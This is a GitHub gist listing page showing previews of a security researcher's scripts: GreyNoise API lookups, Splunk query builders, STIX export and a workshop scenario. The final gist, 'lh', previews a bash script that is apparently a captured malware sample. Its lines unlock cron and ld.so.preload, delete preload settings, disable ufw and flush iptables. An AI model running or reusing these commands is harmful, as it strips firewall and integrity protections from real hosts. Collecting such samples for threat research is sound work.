Skip to content

Instantly share code, notes, and snippets.

View superducktoes's full-sized avatar

Nick Roy superducktoes

31 followers · 21 following
View GitHub Profile
@superducktoes
superducktoes / ip_sim_hunting.py
Created January 11, 2023 16:57
Build Splunk queries based on IP sim output
import requests
import sys
api_key = ""
limit = 10 # can change for more
if(len(sys.argv) < 2):
print("need an IP")
quit()
headers = {
@superducktoes
superducktoes / greynoise_file_query.py
Last active April 12, 2023 16:52
Lookup IP's in a given file against GreyNoise
import fileinput
import re
from greynoise import GreyNoise
# command usage: cat <file_ips>.txt| python3 file_ips_lookup.py
# parses a file line by line to extract IP's
def parse_results(greynoise_results):
for i in greynoise_results:
print("IP: {} - Noise Status: {} - RIOT Status: {}".format(i["ip"], i["noise"], i["riot"]))
@superducktoes
superducktoes / gn_query_write_to_file.py
Last active May 22, 2023 19:22
GreyNoise Write IP's To File
import requests
import json
GN_API_KEY = ""
GN_QUERY = 'tags:"SSH Bruteforcer" last_seen:1d spoofable:false'
file_name = "./greynoise_ips.txt"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"
@superducktoes
superducktoes / GreyNoise GNQL Query Results
Created November 1, 2022 22:23
Query GreyNoise without the GN SDK
import requests
import json
GN_API_KEY = ""
GN_QUERY = "last_seen:1d classification:malicious"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"
HEADERS = {
"accept": "application/json",
@superducktoes
superducktoes / workshop.txt
Last active November 8, 2022 22:15 — forked from Supriya-Maz/workshop.txt
GN Road Show Workshop
Stop Chasing Ghosts: California Roadshow
Cheat Sheet
You’re working at a sticker company called “Milk Co.” One of your developers leaves a vulnerable dev environment exposed to the internet. Users at the workshop will play the role of the Security Analyst at “Milk Co.” and have to investigate the alert to understand what happened, decide how they can stop additional attacks quickly, and then do additional investigation into indicators that can be used for hunting.
Question Answer Form
https://stopchasingghosts.typeform.com/to/JWKos6K2
[Optional] Slack Channel: Join GreyNoise Community Slack and find channel #roadshow-dc
@superducktoes
superducktoes / GreyNoise Firewall Dashboard
Last active May 1, 2023 17:15
Firewall dashboard for Splunk enriching with GreyNoise data
<form theme="dark">
<label>GreyNoise Firewall Data</label>
<fieldset submitButton="false">
<input type="time" token="field1">
<label></label>
<default>
<earliest>-24h@h</earliest>
<latest>now</latest>
</default>
</input>
@superducktoes
superducktoes / file_ips_lookup.py
Created June 3, 2022 18:25
import fileinput
import re
from greynoise import GreyNoise
# command usage: cat <file_ips>.txt| python3 file_ips_lookup.py
api_client = GreyNoise(api_key="")
ip_list = []
# parse file for ips
@superducktoes
superducktoes / greynoise_stix_out.json
Created May 19, 2022 20:17
{
"type": "bundle",
"id": "bundle--156aade4-a0b9-4931-aef7-f400b2ffd1d7",
"objects": [
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7f7cfee6-7cb4-4d8f-8012-bc5959a53564",
"created": "2022-05-19T20:10:17.632149Z",
"modified": "2022-05-19T20:10:17.632149Z",
@superducktoes
superducktoes / greynoise_query_large_data.py
Last active July 29, 2022 17:29
from greynoise import GreyNoise
import json
import csv
import argparse
import os
from stix2 import MemoryStore, Indicator
api_client = GreyNoise(api_key="")
parser = argparse.ArgumentParser()
@superducktoes
superducktoes / lh
Created December 10, 2021 21:30
#!/bin/bash
ulimit -n 65535
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F